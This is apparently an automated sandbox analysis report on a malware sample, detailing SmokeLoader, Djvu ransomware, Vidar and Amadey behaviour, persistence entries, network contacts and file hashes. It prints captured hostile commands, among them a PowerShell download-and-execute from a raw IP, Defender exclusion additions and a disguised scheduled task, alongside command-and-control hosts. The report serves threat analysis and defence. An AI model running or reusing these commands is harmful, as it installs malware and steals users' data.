Analysis Overview
SHA256
1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50
Threat Level: Known bad
The file 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50 was found to be: Known bad.
Malicious Activity Summary
DcRat
Amadey
Detected Djvu ransomware
Djvu Ransomware
SmokeLoader
Detect Vidar Stealer
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Downloads MZ/PE file
Modifies file permissions
Reads user/profile data of web browsers
Identifies Wine through registry keys
Checks BIOS information in registry
Deletes itself
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Creates scheduled task(s)
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-03-15 00:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-15 00:59
Reported
2024-03-15 01:04
Platform
win7-20240221-en
Max time kernel
303s
Max time network
270s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\190491e8-0589-47c4-8568-05aca41dbeb1\\4912.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\4912.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
SmokeLoader
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\190491e8-0589-47c4-8568-05aca41dbeb1\\4912.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\4912.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Windows\CurrentVersion\Run\blyat.dll = "rundll32 C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005011\\blyat.dll, Main" | C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Local\Temp\61F4.exe | N/A |
| File created | C:\Windows\Tasks\explorgu.job | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\DFB7.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\igrvrtd | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\igrvrtd | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Roaming\igrvrtd | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\igrvrtd | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\61F4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\5AC2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe
"C:\Users\Admin\AppData\Local\Temp\1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {6B9E4C8B-2F6A-46C1-BECC-EDF750FC0F99} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\igrvrtd
C:\Users\Admin\AppData\Roaming\igrvrtd
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\F49C.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\4912.exe
C:\Users\Admin\AppData\Local\Temp\4912.exe
C:\Users\Admin\AppData\Local\Temp\4912.exe
C:\Users\Admin\AppData\Local\Temp\4912.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\190491e8-0589-47c4-8568-05aca41dbeb1" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\4912.exe
"C:\Users\Admin\AppData\Local\Temp\4912.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\4912.exe
"C:\Users\Admin\AppData\Local\Temp\4912.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe"
C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe"
C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 1404
C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
"C:\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\DFB7.exe
C:\Users\Admin\AppData\Local\Temp\DFB7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 124
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\E9F5.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\7D2.exe
C:\Users\Admin\AppData\Local\Temp\7D2.exe
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
C:\Users\Admin\AppData\Local\Temp\5AC2.exe
C:\Users\Admin\AppData\Local\Temp\61F4.exe
C:\Users\Admin\AppData\Local\Temp\61F4.exe
C:\Users\Admin\AppData\Local\Temp\70C4.exe
C:\Users\Admin\AppData\Local\Temp\70C4.exe
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\461186416230_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 208
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | trad-einmyus.com | udp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | sdfjhuz.com | udp |
| JM | 63.143.98.185:80 | sdfjhuz.com | tcp |
| US | 8.8.8.8:53 | sportessentia.home.pl | udp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| PL | 79.96.138.166:443 | sportessentia.home.pl | tcp |
| US | 8.8.8.8:53 | m2reg.ulm.ac.id | udp |
| ID | 103.23.232.80:80 | m2reg.ulm.ac.id | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | sajdfue.com | udp |
| JM | 63.143.98.185:80 | sdfjhuz.com | tcp |
| CO | 190.249.149.134:80 | sajdfue.com | tcp |
| CO | 190.249.149.134:80 | sajdfue.com | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.154.77:443 | steamcommunity.com | tcp |
| DE | 5.75.208.156:80 | 5.75.208.156 | tcp |
| RU | 81.94.159.197:80 | trad-einmyus.com | tcp |
| US | 8.8.8.8:53 | valowaves.com | udp |
| US | 172.67.192.62:443 | valowaves.com | tcp |
| US | 8.8.8.8:53 | nessotechbd.com | udp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 192.185.16.114:443 | nessotechbd.com | tcp |
| US | 8.8.8.8:53 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | udp |
| US | 209.141.39.59:443 | dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| NL | 195.20.16.82:443 | tcp | |
| NL | 195.20.16.82:443 | tcp | |
| US | 8.8.8.8:53 | lknusantararaya.com | udp |
| ID | 103.147.154.49:443 | lknusantararaya.com | tcp |
| ID | 103.147.154.49:443 | lknusantararaya.com | tcp |
| US | 8.8.8.8:53 | streamingplay.site | udp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| BR | 45.152.46.72:443 | streamingplay.site | tcp |
| US | 8.8.8.8:53 | www.upload.ee | udp |
| FR | 51.91.30.159:443 | www.upload.ee | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| RU | 185.215.113.45:80 | 185.215.113.45 | tcp |
| US | 8.8.8.8:53 | topgamecheats.dev | udp |
| BG | 93.123.39.96:443 | topgamecheats.dev | tcp |
| NL | 193.222.96.225:80 | 193.222.96.225 | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
| BG | 93.123.39.96:80 | topgamecheats.dev | tcp |
Files
memory/2584-1-0x0000000000290000-0x0000000000390000-memory.dmp
memory/2584-2-0x00000000001B0000-0x00000000001BB000-memory.dmp
memory/2584-3-0x0000000000400000-0x0000000000720000-memory.dmp
memory/1196-4-0x0000000002980000-0x0000000002996000-memory.dmp
memory/2584-5-0x0000000000400000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Roaming\igrvrtd
| MD5 | 15fbdb93344afb1b663ace05ee0d40c1 |
| SHA1 | 03cc060e4c749212cdbce07aeed5623e4f94c27e |
| SHA256 | 1a822ecc24ca2035c45a8b2cc33fb103a499978ba75a81d8ec5c3ac599e91e50 |
| SHA512 | 60f19cc94ff20a2675f906bdd4166df49336018d7362e03386e3dc2bf886ee35e31f4d0955738bea39a0943bea03661cb00405ff03736e9c2349f24b028bcabb |
memory/2468-14-0x0000000000880000-0x0000000000980000-memory.dmp
memory/2468-15-0x0000000000400000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\F49C.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
memory/1196-25-0x0000000003910000-0x0000000003926000-memory.dmp
memory/2468-26-0x0000000000400000-0x0000000000720000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4912.exe
| MD5 | f772938618715239d925c7b7943c5582 |
| SHA1 | 0312bdaca177849dea6df975a70e768ee56cccf4 |
| SHA256 | a2c5938f8e1aeebff52a3077b1bf3ddb8666ea539886846fb64db6c012c8cd33 |
| SHA512 | 6a259c1ced90aded5dc99173831cff6314287af90e9181cbc701221f93f2407714e991ee3881c4e79409081179c1a53e67e5a756f793bfd40fa9f76693a31213 |
memory/2572-36-0x0000000000290000-0x0000000000322000-memory.dmp
memory/2572-37-0x0000000000290000-0x0000000000322000-memory.dmp
memory/2572-38-0x0000000001D60000-0x0000000001E7B000-memory.dmp
memory/2456-41-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2456-43-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2456-46-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2456-47-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2456-70-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2340-71-0x00000000002C0000-0x0000000000352000-memory.dmp
memory/2340-86-0x00000000002C0000-0x0000000000352000-memory.dmp
memory/2312-88-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-92-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | d67fa48cf6cf5f1818b732ea24db1d6e |
| SHA1 | 44858909775b98c384307149a53b231f084427f6 |
| SHA256 | 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27 |
| SHA512 | c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | b642c2ba174da9d65a8cdc4048780293 |
| SHA1 | aa40992c96b49e57eab03a7f57983d3388197e32 |
| SHA256 | b6b36f5f2d84838c75521393d4f9f936bcef87fa9bd804503401eb0b8517f5ab |
| SHA512 | 742661c298f05cbb1b2f52489149cdecfbad1f9c2a8364295e5f9e7525cd3e012fe482d8f066a72beceb684d9d77ebc3cbb599018cfb4764b9d6ef9eb3199054 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | a50b02a961c31efcbe1cf881d0e436b0 |
| SHA1 | 82e575657203fc8d19c05ead8b68b947195c9360 |
| SHA256 | cbc4e81175c4eb7b25521c4ba4a9666a685370c85e3cef407e0ddd70c1f9f9ab |
| SHA512 | f08d01ddfab3f18a746997f6f80a803e18e14b0a87e51146fb2709645d077cde69f8dbdf138efaab79117317c38f8f9a88698dc89a3cfe2163850f5826235fc6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c177018f8a90adbd895ed636688cc98 |
| SHA1 | 3f4771a0fdc807467399e931e8ddd21d566074a1 |
| SHA256 | 796721074a88f491348d0f88c05e58cf6eea4b3cdadc64d243a16208dd1fdc7d |
| SHA512 | 128ff1a89a4892b605d0daf8cd88635a26df021048404e345d5c5f4a18910b9908b2a241cc3544b115d2107e804780dd621ae5a8da6f1113af3951a78ae3a472 |
C:\Users\Admin\AppData\Local\Temp\CabA43B.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
memory/2312-107-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-108-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-110-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-114-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-117-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-116-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2312-118-0x0000000000400000-0x0000000000537000-memory.dmp
\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build2.exe
| MD5 | 47704f454af8641dac1af2e2768d7881 |
| SHA1 | e3341bfdec84f69684aecde18cab2864519c7728 |
| SHA256 | a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64 |
| SHA512 | 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25 |
memory/568-135-0x0000000000260000-0x0000000000360000-memory.dmp
memory/568-136-0x0000000000730000-0x0000000000761000-memory.dmp
memory/2128-134-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2128-138-0x0000000000400000-0x0000000000644000-memory.dmp
memory/2128-141-0x0000000000400000-0x0000000000644000-memory.dmp
memory/2128-142-0x0000000000400000-0x0000000000644000-memory.dmp
\Users\Admin\AppData\Local\9a19cce6-7ac0-4cf9-aa13-a9882fc593c1\build3.exe
| MD5 | 41b883a061c95e9b9cb17d4ca50de770 |
| SHA1 | 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad |
